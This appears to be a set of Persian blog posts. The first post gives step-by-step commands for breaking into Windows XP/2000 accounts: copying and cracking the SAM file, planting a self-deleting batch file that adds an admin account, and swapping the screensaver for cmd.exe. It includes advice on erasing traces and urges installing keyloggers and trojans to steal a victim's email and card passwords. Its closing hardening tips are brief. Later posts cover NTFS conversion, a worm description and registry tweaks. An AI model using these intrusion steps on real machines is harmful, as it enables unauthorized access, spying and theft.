در این مقاله سعی دارم روشهاي نفوذ به ویندوز XP , 2000 را شرح بدهم ، چون وقتی که با روش های نفوذ به ویندوز آشنا باشید بهتر می توانید از آن محافظت کنید .
(توجه : در این مقاله فرض می کنیم که فایل سیستم ویندوز NTFS است ).

برای این کار چند روش وجود دارد :

» روش اول :

در جایی که از شما UserName , Password پرسیده می شود کلید های Alt+Ctrl+Del را دو مرتبه همزمان فشار دهید . در قسمت UserName کلمه Administrator را وارد کرده و جای کلمه عبور را خالی بگذارید و Enter بزنید تا وارد ویندوز شوید ...

خوب این روش ساده بود اما همیشه کارساز نیست اگر برای Administrator آن کلمه عبوری قرار داده شده باشد ؟!!

به سراغ روش دوم میرویم :

» روش دوم :

1- ابتدا یک فلاپی Bootable می سازیم .

2- اغلب فایل سیستم ویندوز XP,2000 از نوع NTFS است و در محیط شبیه Dos که با فلاپی راه اندازی میشود شناخته نمی شود بنا براین ما برای این کار نیاز به برنامه هایی مثل NTFS4DOS ( دانلود : http://users.cjb.net/mojtaba/ntfs4dos.zip ) داریم.(این نوع برنامه ها امکان کار کردن با درایو هایی که فایل سیستم آنها Ntfs را در dos به ما می دهد.)

3- حالا که فلاپی آماده شد باید با آن سیستم را راه اندازی کرد... اما اگر در Setup سیستم تنظیم شده باشد که با فلاپی راه اندازی نشود ...؟!! آنگاه باید در موقعی که سیستم بالا می آید کلید F8 را زد و گزینه ی Flappy را انتخاب کرد و اینتر زد.

4- خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سیستم را با آن راه اندازی می کنیم . و بر نامه NTFS4DOS را اجرا می کنیم تا به اطلاعات درایو های NTFS دسترسی داشته باشیم .

5- درایوی که ویندوز در آن نصب است را پیدا می کنیم و به مسیر زیر رفته :

%Windir%\System32\Config\

مثال : c:\windows\system32\config

در این پوشه فایلی به نام * sam را در فلاپی کپی می کنیم.

( نکته : در ویندوز 2000 با پاک کردن این فایل دیگر کار تمام است و میتوان با Username: Administrator و بدون پسورد وارد شویم اما میتوان برای این که رد پایی باقی نماند از فایل Sam یک کپی داشته باشیم تا بعد از انجام کارمان در ویندوز با برگرداندن این فایل به جای قبلی آن رد پای خود را پاک کنیم و نام و پسورد کاربران به حالت قبل برگردد.)

از این مرحله به بعد برای Windows Xp بیشتر توصیه میشود :

6- بعد از کپی فایل با برنامه هایی نظیر L0phtCrack ,John the Ripper آن را کرک می کنیم تا پسورد را به دست آورد .

» روش سوم :

در این روش چهار مرحله اول روش دوم را انجام میدهیم.

1- دستورات زیر را در Notepad می نویسیم و در فایلی با نام و پسوند test.bat ذخیره میکنیم :

echo off@

net user administrator 123 /add

net localgroup administrator administrators /add

net user administrator 123

del test.bat

echo on@

2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم(به فرض که ویندوز در درایو C نصب باشد و کاربری با نام Sina مدیر سیستم باشد):

C:\Documents and Settings\Sina\Start Menu\Programs\Startup

3- خوب حالا فقط کافی است که منتظر بمانید تا کاربر Sina یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور 123 وارد سیستم شوید.

توضیح دستورات مربوط به فایلی که میسازیم :

در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود.

در خط دوم ما یک کاربر بانام Administrator و کلمه عبور 123 می سازیم .(این عمل برای این صورت می گیرد که ممکن است نام Administrator را تغییر داده باشند).

در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.

در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.

در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.

در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.

 

نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور 123 هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .

روش چهارم :

 حالا در Dos هستیم و دستورات را جلوی خط فرمان می نویسیم .

الف - ابتدا به درایوی می رویم که در آن ویندوز نصب شده است .برای مثال فرض کنیم در درایو C نصب باشد دستور زیر را اجرا می کنیم :
\:c

ب - Windows/System32 میرویم .و در آنجا کارهای زیر را انجام می دهیم :
با دستور : cd windows/system32

پ - یک پوشه ایجاد می کنیم با دستور زیر :
md hack

ت - حالا دو فایل cmd.exe و logon.scr را به این پوشه کپی می کنیم تا یک نسخه پشتیبان از این فایل ها داشته باشیم با اجرای دستورات زیر :
copy cmd.exe hack
copy logon.scr hack

ث - حالا فایل logon.scr را پاک می کنیم :
del logon.scr

ج - حالا فایل cmd.exe را به logon.scr تغییر نام می دهیم :
ren cmd.exe logon.scr

حالا کافی است کامپیوتر را ریستارت کنید .
بعد از این که ویندوز بالا آمد ، اگر توجه کنید چند دقیقه که صبر کنید در حالت عادی Screen saver Logon.scr به اجرا در می آید اما با این دستکاری که ما کرده ایم Cmd.exe به اجرا در می آید حالا می توانید کاربر جدید ایجاد کنید و یا کلمه عبور را عوض کنید .
برای ایجاد حساب کاربری از دستور زیر استفاده می کنیم :

net user Mojtaba 123 /add

این دستور یک حساب کاربری با نام Mojtaba و کلمه عبور 123 ایجاد می کند.
برای این که این کاربر را مدیر(Administrator) قرار دهیم دستور زیر را انجام می دهیم :

net localgroup Mojtaba administrators /add

حالا اگر یک حساب کاربری موجود باشد و بخواهیم پسورد اون رو عوض کنیم دستور زیر را انجام می دهیم :

net user Ali 123

این دستور بدون این که پسورد قبلی کاربر Ali را از ما بخواهد پسورد اون رو به 123 تغییر می دهد.

ضمنا بعد از ورود به سیستم فایل هایی که در پوشه hack کپی کرده ایم را به جای قبلی برگردانید و پوشه hack را پاک کنید تا ردی باقی نماند .

-------------------------------------------------------------------------------------------------
نتیجه :

حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .

اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و ...

دوم این که توصیه می شود یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و ... و وب سایت های که سر می زند و حتی کلماتی که چت می کند و ... را بدانید ( در آینده نه چندان دور مقاله ای در مورد برنامه های جاسوسی خواهم نوشت ).

سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین ...

چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .

پنجم ...

توصیه های مهم :

1- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .

2- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.

3- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.

4- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.

5- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .

6- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید .

7- هر چند وقت یکبار پسورد خود را عوض کنید.

8- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید.

نظر بدین دیگه    

نوع فرمت هاردديسك PC ، توسط فايل سيستم تعيين مي شود. در واقع فايل سيستم چگونگي ثبت اطلاعات روي هارد ديسك را مديريت مي كند. ويندوز براي مديريت ثبت اطلاعات در هارد ديسك، از سه گونه فايل سيستم استفاده مي كند:
اولين نوع آن ها كه FAT يا File Allocation Table نام گرفتند، توسط سيستم عامل هاي داس و ويندوز (تا ويندوز 95) مورد استفاده قرار مي گرفتند. اين روش قالب بندي اطلاعات، با نام FAT 16 نيز شناخته مي شد. زيرا بر اساس داده هاي 16 بيتي كار مي كرد. دومين نوع آن ها FAT 3 نام گرفت كه توسط ويندوز 98 ارائه شد. اين روش از روش FAT 16 متمايز است و كاربر را قادر مي سازد بيشتر از 2 گيگابايت اطلاعات را روي هارد خود مديريت كند. سومين و آخرين روش ثبت داده ها روي هارد ديسك، با نام NTFS ( NT File System ) توسط ويندوز NT ، 2000 ، و XP مورد استفاده قرار گرفت. اين روش نسبت به FAT 16 و FAT 32 از ثبات بيشتري برخوردار است و تاثير به سزايي در استفاده از حداكثر فضاي مفيد هاردديسك براي ذخيره اطلاعات دارد. براي اطلاع از نوع فايل سيستم هاردديسك خود، روي My Computer كليك راست كنيد و سپس Properties را انتخاب كنيد. براي ديدن همه ديسك ها و پارتيشن ها، روي Start كليك كنيد و بعد روي My Computer كليك راست كنيد و سپس Manage و بعد از آن Disk Management را بزنيد. در اين قسمت مي توانيد نوع فايل سيستم هر پارتيشن يا هارد ديسك را ببينيد تا بدانيد سيستم عامل شما از چه سيستمي براي مديريت اطلاعات هاردديسك استفاده مي كند. از آن جايي كه استفاده از NTFS به جاي FAT ، مزيت هاي متعددي در بر خواهد داشت. اگر هنوز هارد ديسك شما مبتني بر FAT است، بهتر است آن را به NTFS تغيير دهيد.

مي توانيد با پارتيشن بندي مبتني بر FAT32 را به NTFS تغيير دهيد. بدون آن كه به داده هاي رايانه شما آسيبي برسد. با اين وجود باز هم يك نسخه پشتيبان از اطلاعات موجود در رايانه خود تهيه كنيد تا مطمئن شويد كه چيزي را از دست نخواهيد داد. روي Start و بعد روي RUN كليك كنيد. در نوار Open ، عبارت Cmd را وارد كنيد. سپس روي OK كليك كنيد تا پنجره خط فرمان ويندوز باز شود. 
دقت كنيد كه به جاي ] Volume [ بايد نام درايو يا پارتيشني را كه قرار است تبديل شود، وارد كنيد. در اين مورد به طور فرضي درايو E تبديل خواهيم كرد كه بر اين اساس در خط فرمان بايد وارد كنيم، Convert E:\FS:NTFS سپس Enter را بزنيد تا دستور اجرا شود.

نظر بدین دیگه

 

نام ویروس : W32/Sober.r@MM
نوع : ویروس
میزان حجم : 113,551
طریقه پخش : E-mail

تشریح :
این کرم خود را از طریق فایل های ضمیمه به نام های KlassenFoto.zip و pword_change.zip و screen_photo.zip و privat-photo.zip پخش می کند .
درون این فایل های Zip شده فایل های اجرایی به نام PW_Klass.Pic.packed-bitmap.exe و Screen_Photo.jpeg-graphic1.exe
این کرم در مرحله اول شاخه های زیر را در رجیستری تهیه می کند :

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run " WinINet" =C:\WINDOWS\ConnectionStatus\services.exe
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Run "_WinINet"=C:\WINDOWS\ConnectionStatus\services.exe

سپس فایل های زیر را می سازد :

• c:\WINDOWS\ConnectionStatus\netslot.nst
• c:\WINDOWS\ConnectionStatus\services.exe
• c:\WINDOWS\ConnectionStatus\socket.dli

سپس فایل های با حجم 0 درست می کند با نام و آدرس های زیر :

• c:\WINDOWS\system32\bbvmwxxf.hml
• c:\WINDOWS\system32\gdfjgthv.cvq
• c:\WINDOWS\system32\langeinf.lin
• c:\WINDOWS\system32\nonrunso.ber
• c:\WINDOWS\system32\rubezahl.rub
• c:\WINDOWS\system32\seppelmx.smx

سپس پورت های شماره TCP 587 و TCP 37 و صفحه خانگی قربانی را عوض می کند .
تیم irvirus حداکثر تا 12 ساعت دیگر پج آنتی ان را به زبان فارسی برای شما عزیزان قرار می دهد .
برای پاک سازی دستی هم می توانید از طریق Safe mode فایل های یاد شده را پاک و شاخه ایجاد شده را در رجیستری پاک کنید .

هنگامي كه وارد پنجره Dial-up Networking مي شويد و روي آيكونهاي تماس خود كليك مي كنيد پنجره اي ظاهر مي شود كه اگر Username, Password و همچنين شماره تلفن را وارد كنيم و بعد دكمه Connect را فشار دهيم، تماس با اينترنت از طريق خط تلفن برقرار خواهد شد و بعد از اولين تماس موفقيت آميز، Username در اين پنجره ثبت خواهد شد و براي تماس مجدد ديگر احتياجي به وارد كردن مجدد Username نمي باشد .

البته اين مسئله عيبي كه دارد اينست كه كاربران ديگر متوجه Username ما مي شوند.
بدين منظور جهت جلوگيري از ثبت شدن Username, دستور زير را با مقدار 1 به كار ببريد.

فقط در ویندوزهای : XP - 2000

در regedit  به مسير زیر بروید :

 HKEY_Local_Machine\System\Currentcontealset\Services\Rasman\Parameters 

یک String Value بسازید و اسم آن را DisableSavePassword بگذارید و مقدار 1 را به آن بدهید.

نظر بدین

مراحل كار در ويندوز :

روي My Computer دابل كليك كنيد

درايوي را كه مي خواهيد عيب يابي کنيد انتخاب كنيد

Properties را از منوي File انتخاب كنيد. اكنون بايد يك سري اطلاعات و مشخصات از اين درايو در منوي

 Properties ببينيد.

تب Tools را انتخاب كنيد.

تكمه Check Now را از قسمت Error Checking كليك كنيد.

بستگی به ورژن ويندوز خود گزينه "thorough" يا " Scan for and Attempt of Recovery Bad Sector " را انتخاب كنيد.

روی استارت کلیک کنید.

نظر فراموش نشه

سلام

خیلی وقت که اپدیت نکردم.سرم شلوغ بود.ببخشید دیگه.

می خواستم بگم که بخش اخبار IT در وبلاگ افتتاح شد.